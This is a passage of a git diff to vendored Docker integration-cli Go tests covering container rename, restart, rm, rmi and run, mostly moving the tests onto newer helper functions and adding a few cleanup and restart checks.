newName := "new_name" + stringid.GenerateNonCryptoID() - dockerCmd(c, "rename", "first_name", newName) - - name = inspectField(c, cleanedContainerID, "Name") - c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name)) - -} - -func (s *DockerSuite) TestRenameRunningContainer(c *check.C) { - out, _ := dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh") - - newName := "new_name" + stringid.GenerateNonCryptoID() - cleanedContainerID := strings.TrimSpace(out) - dockerCmd(c, "rename", "first_name", newName) - - name := inspectField(c, cleanedContainerID, "Name") - c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name)) -} - -func (s *DockerSuite) TestRenameRunningContainerAndReuse(c *check.C) { - out, _ := runSleepingContainer(c, "--name", "first_name") - c.Assert(waitRun("first_name"), check.IsNil) - - newName := "new_name" - ContainerID := strings.TrimSpace(out) - dockerCmd(c, "rename", "first_name", newName) - - name := inspectField(c, ContainerID, "Name") - c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container")) - - out, _ = runSleepingContainer(c, "--name", "first_name") - c.Assert(waitRun("first_name"), check.IsNil) - newContainerID := strings.TrimSpace(out) - name = inspectField(c, newContainerID, "Name") - c.Assert(name, checker.Equals, "/first_name", check.Commentf("Failed to reuse container name")) -} - -func (s *DockerSuite) TestRenameCheckNames(c *check.C) { - dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh") - - newName := "new_name" + stringid.GenerateNonCryptoID() - dockerCmd(c, "rename", "first_name", newName) - - name := inspectField(c, newName, "Name") - c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name)) - - result := dockerCmdWithResult("inspect", "-f={{.Name}}", "--type=container", "first_name") - c.Assert(result, icmd.Matches, icmd.Expected{ - ExitCode: 1, 
- Err: "No such container: first_name", - }) -} - -func (s *DockerSuite) TestRenameInvalidName(c *check.C) { - runSleepingContainer(c, "--name", "myname") - - out, _, err := dockerCmdWithError("rename", "myname", "new:invalid") - c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out)) - c.Assert(out, checker.Contains, "Invalid container name", check.Commentf("%v", err)) - - out, _, err = dockerCmdWithError("rename", "myname") - c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out)) - c.Assert(out, checker.Contains, "requires exactly 2 argument(s).", check.Commentf("%v", err)) - - out, _, err = dockerCmdWithError("rename", "myname", "") - c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out)) - c.Assert(out, checker.Contains, "may be empty", check.Commentf("%v", err)) - - out, _, err = dockerCmdWithError("rename", "", "newname") - c.Assert(err, checker.NotNil, check.Commentf("Renaming container with empty name should have failed: %s", out)) - c.Assert(out, checker.Contains, "may be empty", check.Commentf("%v", err)) - - out, _ = dockerCmd(c, "ps", "-a") - c.Assert(out, checker.Contains, "myname", check.Commentf("Output of docker ps should have included 'myname': %s", out)) -} - -func (s *DockerSuite) TestRenameAnonymousContainer(c *check.C) { - testRequires(c, DaemonIsLinux) - - dockerCmd(c, "network", "create", "network1") - out, _ := dockerCmd(c, "create", "-it", "--net", "network1", "busybox", "top") - - anonymousContainerID := strings.TrimSpace(out) - - dockerCmd(c, "rename", anonymousContainerID, "container1") - dockerCmd(c, "start", "container1") - - count := "-c" - if daemonPlatform == "windows" { - count = "-n" - } - - _, _, err := dockerCmdWithError("run", "--net", "network1", "busybox", "ping", count, "1", "container1") - c.Assert(err, check.IsNil, check.Commentf("Embedded DNS lookup fails 
after renaming anonymous container: %v", err)) -} - -func (s *DockerSuite) TestRenameContainerWithSameName(c *check.C) { - out, _ := runSleepingContainer(c, "--name", "old") - ContainerID := strings.TrimSpace(out) - - out, _, err := dockerCmdWithError("rename", "old", "old") - c.Assert(err, checker.NotNil, check.Commentf("Renaming a container with the same name should have failed")) - c.Assert(out, checker.Contains, "Renaming a container with the same name", check.Commentf("%v", err)) - - out, _, err = dockerCmdWithError("rename", ContainerID, "old") - c.Assert(err, checker.NotNil, check.Commentf("Renaming a container with the same name should have failed")) - c.Assert(out, checker.Contains, "Renaming a container with the same name", check.Commentf("%v", err)) -} - -// Test case for #23973 -func (s *DockerSuite) TestRenameContainerWithLinkedContainer(c *check.C) { - testRequires(c, DaemonIsLinux) - - db1, _ := dockerCmd(c, "run", "--name", "db1", "-d", "busybox", "top") - dockerCmd(c, "run", "--name", "app1", "-d", "--link", "db1:/mysql", "busybox", "top") - dockerCmd(c, "rename", "app1", "app2") - out, _, err := dockerCmdWithError("inspect", "--format={{ .Id }}", "app2/mysql") - c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Equals, strings.TrimSpace(db1)) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go index 7d585289eb..1b4c928b9a 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go @@ -6,14 +6,13 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) func (s *DockerSuite) TestRestartStoppedContainer(c *check.C) { dockerCmd(c, "run", "--name=test", "busybox", "echo", "foobar") - cleanedContainerID, 
err := getIDByName("test") - c.Assert(err, check.IsNil) + cleanedContainerID := getIDByName(c, "test") out, _ := dockerCmd(c, "logs", cleanedContainerID) c.Assert(out, checker.Equals, "foobar\n") @@ -21,7 +20,7 @@ func (s *DockerSuite) TestRestartStoppedContainer(c *check.C) { dockerCmd(c, "restart", cleanedContainerID) // Wait until the container has stopped - err = waitInspect(cleanedContainerID, "{{.State.Running}}", "false", 20*time.Second) + err := waitInspect(cleanedContainerID, "{{.State.Running}}", "false", 20*time.Second) c.Assert(err, checker.IsNil) out, _ = dockerCmd(c, "logs", cleanedContainerID) @@ -35,22 +34,25 @@ func (s *DockerSuite) TestRestartRunningContainer(c *check.C) { c.Assert(waitRun(cleanedContainerID), checker.IsNil) - out, _ = dockerCmd(c, "logs", cleanedContainerID) - c.Assert(out, checker.Equals, "foobar\n") - - dockerCmd(c, "restart", "-t", "1", cleanedContainerID) + getLogs := func(c *check.C) (interface{}, check.CommentInterface) { + out, _ := dockerCmd(c, "logs", cleanedContainerID) + return out, nil + } - out, _ = dockerCmd(c, "logs", cleanedContainerID) + // Wait 10 seconds for the 'echo' to appear in the logs + waitAndAssert(c, 10*time.Second, getLogs, checker.Equals, "foobar\n") + dockerCmd(c, "restart", "-t", "1", cleanedContainerID) c.Assert(waitRun(cleanedContainerID), checker.IsNil) - c.Assert(out, checker.Equals, "foobar\nfoobar\n") + // Wait 10 seconds for first 'echo' appear (again) in the logs + waitAndAssert(c, 10*time.Second, getLogs, checker.Equals, "foobar\nfoobar\n") } // Test that restarting a container with a volume does not create a new volume on restart. Regression test for #819. 
func (s *DockerSuite) TestRestartWithVolumes(c *check.C) { prefix, slash := getPrefixAndSlashFromDaemonPlatform() - out, _ := runSleepingContainer(c, "-d", "-v", prefix+slash+"test") + out := runSleepingContainer(c, "-d", "-v", prefix+slash+"test") cleanedContainerID := strings.TrimSpace(out) out, err := inspectFilter(cleanedContainerID, "len .Mounts") @@ -73,6 +75,23 @@ func (s *DockerSuite) TestRestartWithVolumes(c *check.C) { c.Assert(source, checker.Equals, sourceAfterRestart) } +func (s *DockerSuite) TestRestartDisconnectedContainer(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace, NotArm) + + // Run a container on the default bridge network + out, _ := dockerCmd(c, "run", "-d", "--name", "c0", "busybox", "top") + cleanedContainerID := strings.TrimSpace(out) + c.Assert(waitRun(cleanedContainerID), checker.IsNil) + + // Disconnect the container from the network + out, err := dockerCmd(c, "network", "disconnect", "bridge", "c0") + c.Assert(err, check.NotNil, check.Commentf(out)) + + // Restart the container + dockerCmd(c, "restart", "c0") + c.Assert(err, check.NotNil, check.Commentf(out)) +} + func (s *DockerSuite) TestRestartPolicyNO(c *check.C) { out, _ := dockerCmd(c, "create", "--restart=no", "busybox") @@ -147,7 +166,7 @@ func (s *DockerSuite) TestRestartContainerwithGoodContainer(c *check.C) { func (s *DockerSuite) TestRestartContainerSuccess(c *check.C) { testRequires(c, SameHostDaemon) - out, _ := runSleepingContainer(c, "-d", "--restart=always") + out := runSleepingContainer(c, "-d", "--restart=always") id := strings.TrimSpace(out) c.Assert(waitRun(id), check.IsNil) @@ -216,7 +235,7 @@ func (s *DockerSuite) TestRestartWithPolicyUserDefinedNetwork(c *check.C) { func (s *DockerSuite) TestRestartPolicyAfterRestart(c *check.C) { testRequires(c, SameHostDaemon) - out, _ := runSleepingContainer(c, "-d", "--restart=always") + out := runSleepingContainer(c, "-d", "--restart=always") id := strings.TrimSpace(out) 
c.Assert(waitRun(id), check.IsNil) @@ -250,7 +269,7 @@ func (s *DockerSuite) TestRestartContainerwithRestartPolicy(c *check.C) { id1 := strings.TrimSpace(string(out1)) id2 := strings.TrimSpace(string(out2)) waitTimeout := 15 * time.Second - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { waitTimeout = 150 * time.Second } err := waitInspect(id1, "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTimeout) @@ -259,14 +278,23 @@ func (s *DockerSuite) TestRestartContainerwithRestartPolicy(c *check.C) { dockerCmd(c, "restart", id1) dockerCmd(c, "restart", id2) + // Make sure we can stop/start (regression test from a705e166cf3bcca62543150c2b3f9bfeae45ecfa) dockerCmd(c, "stop", id1) dockerCmd(c, "stop", id2) dockerCmd(c, "start", id1) dockerCmd(c, "start", id2) + + // Kill the containers, making sure the are stopped at the end of the test + dockerCmd(c, "kill", id1) + dockerCmd(c, "kill", id2) + err = waitInspect(id1, "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTimeout) + c.Assert(err, checker.IsNil) + err = waitInspect(id2, "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTimeout) + c.Assert(err, checker.IsNil) } func (s *DockerSuite) TestRestartAutoRemoveContainer(c *check.C) { - out, _ := runSleepingContainer(c, "--rm") + out := runSleepingContainer(c, "--rm") id := strings.TrimSpace(string(out)) dockerCmd(c, "restart", id) @@ -275,4 +303,7 @@ func (s *DockerSuite) TestRestartAutoRemoveContainer(c *check.C) { out, _ = dockerCmd(c, "ps") c.Assert(out, checker.Contains, id[:12], check.Commentf("container should be restarted instead of removed: %v", out)) + + // Kill the container to make sure it will be removed + dockerCmd(c, "kill", id) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go deleted file mode 100644 index 0186c56741..0000000000 --- 
a/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go +++ /dev/null @@ -1,86 +0,0 @@ -package main - -import ( - "io/ioutil" - "os" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestRmContainerWithRemovedVolume(c *check.C) { - testRequires(c, SameHostDaemon) - - prefix, slash := getPrefixAndSlashFromDaemonPlatform() - - tempDir, err := ioutil.TempDir("", "test-rm-container-with-removed-volume-") - if err != nil { - c.Fatalf("failed to create temporary directory: %s", tempDir) - } - defer os.RemoveAll(tempDir) - - dockerCmd(c, "run", "--name", "losemyvolumes", "-v", tempDir+":"+prefix+slash+"test", "busybox", "true") - - err = os.RemoveAll(tempDir) - c.Assert(err, check.IsNil) - - dockerCmd(c, "rm", "-v", "losemyvolumes") -} - -func (s *DockerSuite) TestRmContainerWithVolume(c *check.C) { - prefix, slash := getPrefixAndSlashFromDaemonPlatform() - - dockerCmd(c, "run", "--name", "foo", "-v", prefix+slash+"srv", "busybox", "true") - - dockerCmd(c, "rm", "-v", "foo") -} - -func (s *DockerSuite) TestRmContainerRunning(c *check.C) { - createRunningContainer(c, "foo") - - _, _, err := dockerCmdWithError("rm", "foo") - c.Assert(err, checker.NotNil, check.Commentf("Expected error, can't rm a running container")) -} - -func (s *DockerSuite) TestRmContainerForceRemoveRunning(c *check.C) { - createRunningContainer(c, "foo") - - // Stop then remove with -s - dockerCmd(c, "rm", "-f", "foo") -} - -func (s *DockerSuite) TestRmContainerOrphaning(c *check.C) { - dockerfile1 := `FROM busybox:latest - ENTRYPOINT ["true"]` - img := "test-container-orphaning" - dockerfile2 := `FROM busybox:latest - ENTRYPOINT ["true"] - MAINTAINER Integration Tests` - - // build first dockerfile - img1, err := buildImage(img, dockerfile1, true) - c.Assert(err, check.IsNil, check.Commentf("Could not build image %s", img)) - // run container on first image - dockerCmd(c, "run", img) - // rebuild dockerfile with a small 
addition at the end - _, err = buildImage(img, dockerfile2, true) - c.Assert(err, check.IsNil, check.Commentf("Could not rebuild image %s", img)) - // try to remove the image, should not error out. - out, _, err := dockerCmdWithError("rmi", img) - c.Assert(err, check.IsNil, check.Commentf("Expected to removing the image, but failed: %s", out)) - - // check if we deleted the first image - out, _ = dockerCmd(c, "images", "-q", "--no-trunc") - c.Assert(out, checker.Contains, img1, check.Commentf("Orphaned container (could not find %q in docker images): %s", img1, out)) - -} - -func (s *DockerSuite) TestRmInvalidContainer(c *check.C) { - out, _, err := dockerCmdWithError("rm", "unknown") - c.Assert(err, checker.NotNil, check.Commentf("Expected error on rm unknown container, got none")) - c.Assert(out, checker.Contains, "No such container") -} - -func createRunningContainer(c *check.C, name string) { - runSleepingContainer(c, "-dt", "--name", name) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go index cb16d9d88c..6622856823 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go @@ -2,13 +2,15 @@ package main import ( "fmt" - "os/exec" "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" "github.com/docker/docker/pkg/stringid" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestRmiWithContainerFails(c *check.C) { @@ -61,84 +63,78 @@ func (s *DockerSuite) TestRmiTag(c *check.C) { } func (s *DockerSuite) TestRmiImgIDMultipleTag(c *check.C) { - out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-one'") - + out := cli.DockerCmd(c, 
"run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-one'").Combined() containerID := strings.TrimSpace(out) // Wait for it to exit as cannot commit a running container on Windows, and // it will take a few seconds to exit - if daemonPlatform == "windows" { - err := waitExited(containerID, 60*time.Second) - c.Assert(err, check.IsNil) + if testEnv.OSType == "windows" { + cli.WaitExited(c, containerID, 60*time.Second) } - dockerCmd(c, "commit", containerID, "busybox-one") + cli.DockerCmd(c, "commit", containerID, "busybox-one") - imagesBefore, _ := dockerCmd(c, "images", "-a") - dockerCmd(c, "tag", "busybox-one", "busybox-one:tag1") - dockerCmd(c, "tag", "busybox-one", "busybox-one:tag2") + imagesBefore := cli.DockerCmd(c, "images", "-a").Combined() + cli.DockerCmd(c, "tag", "busybox-one", "busybox-one:tag1") + cli.DockerCmd(c, "tag", "busybox-one", "busybox-one:tag2") - imagesAfter, _ := dockerCmd(c, "images", "-a") + imagesAfter := cli.DockerCmd(c, "images", "-a").Combined() // tag busybox to create 2 more images with same imageID c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+2, check.Commentf("docker images shows: %q\n", imagesAfter)) imgID := inspectField(c, "busybox-one:tag1", "Id") // run a container with the image - out, _ = runSleepingContainerInImage(c, "busybox-one") - + out = runSleepingContainerInImage(c, "busybox-one") containerID = strings.TrimSpace(out) // first checkout without force it fails - out, _, err := dockerCmdWithError("rmi", imgID) - expected := fmt.Sprintf("conflict: unable to delete %s (cannot be forced) - image is being used by running container %s", stringid.TruncateID(imgID), stringid.TruncateID(containerID)) // rmi tagged in multiple repos should have failed without force - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, expected) + cli.Docker(cli.Args("rmi", imgID)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: fmt.Sprintf("conflict: unable to delete %s (cannot be 
forced) - image is being used by running container %s", stringid.TruncateID(imgID), stringid.TruncateID(containerID)), + }) - dockerCmd(c, "stop", containerID) - dockerCmd(c, "rmi", "-f", imgID) + cli.DockerCmd(c, "stop", containerID) + cli.DockerCmd(c, "rmi", "-f", imgID) - imagesAfter, _ = dockerCmd(c, "images", "-a") + imagesAfter = cli.DockerCmd(c, "images", "-a").Combined() // rmi -f failed, image still exists c.Assert(imagesAfter, checker.Not(checker.Contains), imgID[:12], check.Commentf("ImageID:%q; ImagesAfter: %q", imgID, imagesAfter)) } func (s *DockerSuite) TestRmiImgIDForce(c *check.C) { - out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-test'") - + out := cli.DockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-test'").Combined() containerID := strings.TrimSpace(out) // Wait for it to exit as cannot commit a running container on Windows, and // it will take a few seconds to exit - if daemonPlatform == "windows" { - err := waitExited(containerID, 60*time.Second) - c.Assert(err, check.IsNil) + if testEnv.OSType == "windows" { + cli.WaitExited(c, containerID, 60*time.Second) } - dockerCmd(c, "commit", containerID, "busybox-test") + cli.DockerCmd(c, "commit", containerID, "busybox-test") - imagesBefore, _ := dockerCmd(c, "images", "-a") - dockerCmd(c, "tag", "busybox-test", "utest:tag1") - dockerCmd(c, "tag", "busybox-test", "utest:tag2") - dockerCmd(c, "tag", "busybox-test", "utest/docker:tag3") - dockerCmd(c, "tag", "busybox-test", "utest:5000/docker:tag4") + imagesBefore := cli.DockerCmd(c, "images", "-a").Combined() + cli.DockerCmd(c, "tag", "busybox-test", "utest:tag1") + cli.DockerCmd(c, "tag", "busybox-test", "utest:tag2") + cli.DockerCmd(c, "tag", "busybox-test", "utest/docker:tag3") + cli.DockerCmd(c, "tag", "busybox-test", "utest:5000/docker:tag4") { - imagesAfter, _ := dockerCmd(c, "images", "-a") + imagesAfter := cli.DockerCmd(c, "images", "-a").Combined() c.Assert(strings.Count(imagesAfter, 
"\n"), checker.Equals, strings.Count(imagesBefore, "\n")+4, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter)) } imgID := inspectField(c, "busybox-test", "Id") // first checkout without force it fails - out, _, err := dockerCmdWithError("rmi", imgID) - // rmi tagged in multiple repos should have failed without force - c.Assert(err, checker.NotNil) - // rmi tagged in multiple repos should have failed without force - c.Assert(out, checker.Contains, "(must be forced) - image is referenced in multiple repositories", check.Commentf("out: %s; err: %v;", out, err)) + cli.Docker(cli.Args("rmi", imgID)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "(must be forced) - image is referenced in multiple repositories", + }) - dockerCmd(c, "rmi", "-f", imgID) + cli.DockerCmd(c, "rmi", "-f", imgID) { - imagesAfter, _ := dockerCmd(c, "images", "-a") + imagesAfter := cli.DockerCmd(c, "images", "-a").Combined() // rmi failed, image still exists c.Assert(imagesAfter, checker.Not(checker.Contains), imgID[:12]) } @@ -147,8 +143,8 @@ func (s *DockerSuite) TestRmiImgIDForce(c *check.C) { // See https://github.com/docker/docker/issues/14116 func (s *DockerSuite) TestRmiImageIDForceWithRunningContainersAndMultipleTags(c *check.C) { dockerfile := "FROM busybox\nRUN echo test 14116\n" - imgID, err := buildImage("test-14116", dockerfile, false) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, "test-14116", build.WithDockerfile(dockerfile)) + imgID := getIDByName(c, "test-14116") newTag := "newtag" dockerCmd(c, "tag", imgID, newTag) @@ -175,12 +171,11 @@ func (s *DockerSuite) TestRmiTagWithExistingContainers(c *check.C) { func (s *DockerSuite) TestRmiForceWithExistingContainers(c *check.C) { image := "busybox-clone" - cmd := exec.Command(dockerBinary, "build", "--no-cache", "-t", image, "-") - cmd.Stdin = strings.NewReader(`FROM busybox -MAINTAINER foo`) - - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.IsNil, check.Commentf("Could not build 
%s: %s", image, out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "build", "--no-cache", "-t", image, "-"}, + Stdin: strings.NewReader(`FROM busybox +MAINTAINER foo`), + }).Assert(c, icmd.Success) dockerCmd(c, "run", "--name", "test-force-rmi", image, "/bin/true") @@ -206,14 +201,8 @@ func (s *DockerSuite) TestRmiForceWithMultipleRepositories(c *check.C) { tag1 := imageName + ":tag1" tag2 := imageName + ":tag2" - _, err := buildImage(tag1, - `FROM busybox - MAINTAINER "docker"`, - true) - if err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, tag1, build.WithDockerfile(`FROM busybox + MAINTAINER "docker"`)) dockerCmd(c, "tag", tag1, tag2) out, _ := dockerCmd(c, "rmi", "-f", tag2) @@ -241,8 +230,8 @@ func (s *DockerSuite) TestRmiContainerImageNotFound(c *check.C) { imageIds := make([]string, 2) for i, name := range imageNames { dockerfile := fmt.Sprintf("FROM busybox\nMAINTAINER %s\nRUN echo %s\n", name, name) - id, err := buildImage(name, dockerfile, false) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, name, build.WithoutCache, build.WithDockerfile(dockerfile)) + id := getIDByName(c, name) imageIds[i] = id } @@ -270,9 +259,7 @@ RUN echo 0 #layer0 RUN echo 1 #layer1 RUN echo 2 #layer2 ` - _, err := buildImage(image, dockerfile, false) - c.Assert(err, checker.IsNil) - + buildImageSuccessfully(c, image, build.WithoutCache, build.WithDockerfile(dockerfile)) out, _ := dockerCmd(c, "history", "-q", image) ids := strings.Split(out, "\n") idToTag := ids[2] @@ -295,7 +282,7 @@ RUN echo 2 #layer2 // At this point we have 2 containers, one based on layer2 and another based on layer0. // Try to untag "tmp2" without the -f flag. 
- out, _, err = dockerCmdWithError("rmi", newTag) + out, _, err := dockerCmdWithError("rmi", newTag) // should not be untagged without the -f flag c.Assert(err, checker.NotNil) c.Assert(out, checker.Contains, cid[:12]) @@ -308,10 +295,9 @@ RUN echo 2 #layer2 } func (*DockerSuite) TestRmiParentImageFail(c *check.C) { - _, err := buildImage("test", ` + buildImageSuccessfully(c, "test", build.WithDockerfile(` FROM busybox - RUN echo hello`, false) - c.Assert(err, checker.IsNil) + RUN echo hello`)) id := inspectField(c, "busybox", "ID") out, _, err := dockerCmdWithError("rmi", id) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go index 9462aef800..aaaa7174d3 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go @@ -3,6 +3,7 @@ package main import ( "bufio" "bytes" + "context" "encoding/json" "fmt" "io" @@ -21,17 +22,21 @@ import ( "sync" "time" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/testutil" "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/parsers/kernel" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/stringutils" "github.com/docker/docker/runconfig" "github.com/docker/go-connections/nat" "github.com/docker/libnetwork/resolvconf" "github.com/docker/libnetwork/types" "github.com/go-check/check" - libcontainerUser "github.com/opencontainers/runc/libcontainer/user" + "gotest.tools/icmd" ) // "test123" should be printed by docker run @@ -66,12 +71,12 @@ func (s 
*DockerSuite) TestRunLeakyFileDescriptors(c *check.C) { // this will fail when Internet access is unavailable func (s *DockerSuite) TestRunLookupGoogleDNS(c *check.C) { testRequires(c, Network, NotArm) - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // nslookup isn't present in Windows busybox. Is built-in. Further, // nslookup isn't present in nanoserver. Hence just use PowerShell... - dockerCmd(c, "run", WindowsBaseImage, "powershell", "Resolve-DNSName", "google.com") + dockerCmd(c, "run", testEnv.PlatformDefaults.BaseImage, "powershell", "Resolve-DNSName", "google.com") } else { - dockerCmd(c, "run", DefaultImage, "nslookup", "google.com") + dockerCmd(c, "run", "busybox", "nslookup", "google.com") } } @@ -92,12 +97,12 @@ func (s *DockerSuite) TestRunExitCodeOne(c *check.C) { func (s *DockerSuite) TestRunStdinPipe(c *check.C) { // TODO Windows: This needs some work to make compatible. testRequires(c, DaemonIsLinux) - runCmd := exec.Command(dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat") - runCmd.Stdin = strings.NewReader("blahblah") - out, _, _, err := runCommandWithStdoutStderr(runCmd) - if err != nil { - c.Fatalf("failed to run container: %v, output: %q", err, out) - } + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat"}, + Stdin: strings.NewReader("blahblah"), + }) + result.Assert(c, icmd.Success) + out := result.Stdout() out = strings.TrimSpace(out) dockerCmd(c, "wait", out) @@ -131,7 +136,7 @@ func (s *DockerSuite) TestRunDetachedContainerIDPrinting(c *check.C) { func (s *DockerSuite) TestRunWorkingDirectory(c *check.C) { dir := "/root" image := "busybox" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { dir = `C:/Windows` } @@ -154,9 +159,9 @@ func (s *DockerSuite) TestRunWorkingDirectory(c *check.C) { func (s *DockerSuite) TestRunWithoutNetworking(c *check.C) { count := "-c" image := "busybox" - if daemonPlatform == "windows" { + if 
testEnv.OSType == "windows" { count = "-n" - image = WindowsBaseImage + image = testEnv.PlatformDefaults.BaseImage } // First using the long form --net @@ -289,7 +294,7 @@ func (s *DockerSuite) TestUserDefinedNetworkAlias(c *check.C) { testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) dockerCmd(c, "network", "create", "-d", "bridge", "net1") - cid1, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo1", "--net-alias=foo2", "busybox", "top") + cid1, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo1", "--net-alias=foo2", "busybox:glibc", "top") c.Assert(waitRun("first"), check.IsNil) // Check if default short-id alias is added automatically @@ -297,7 +302,7 @@ func (s *DockerSuite) TestUserDefinedNetworkAlias(c *check.C) { aliases := inspectField(c, id, "NetworkSettings.Networks.net1.Aliases") c.Assert(aliases, checker.Contains, stringid.TruncateID(id)) - cid2, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox", "top") + cid2, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox:glibc", "top") c.Assert(waitRun("second"), check.IsNil) // Check if default short-id alias is added automatically @@ -348,8 +353,8 @@ func (s *DockerSuite) TestRunWithVolumesFromExited(c *check.C) { ) // Create a file in a volume - if daemonPlatform == "windows" { - out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", `c:\some\dir`, WindowsBaseImage, "cmd", "/c", `echo hello > c:\some\dir\file`) + if testEnv.OSType == "windows" { + out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", `c:\some\dir`, testEnv.PlatformDefaults.BaseImage, "cmd", "/c", `echo hello > c:\some\dir\file`) } else { out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", "/some/dir", "busybox", "touch", "/some/dir/file") } @@ -358,8 +363,8 @@ func (s *DockerSuite) TestRunWithVolumesFromExited(c *check.C) { } // Read the file from another container using --volumes-from to 
access the volume in the second container - if daemonPlatform == "windows" { - out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", WindowsBaseImage, "cmd", "/c", `type c:\some\dir\file`) + if testEnv.OSType == "windows" { + out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", testEnv.PlatformDefaults.BaseImage, "cmd", "/c", `type c:\some\dir\file`) } else { out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", "busybox", "cat", "/some/dir/file") } @@ -376,7 +381,7 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) { containerPath string cmd string ) - // TODO Windows (Post TP5): This test cannot run on a Windows daemon as + // This test cannot run on a Windows daemon as // Windows does not support symlinks inside a volume path testRequires(c, SameHostDaemon, DaemonIsLinux) name := "test-volume-symlink" @@ -390,7 +395,7 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) { // In the case of Windows to Windows CI, if the machine is setup so that // the temp directory is not the C: drive, this test is invalid and will // not work. 
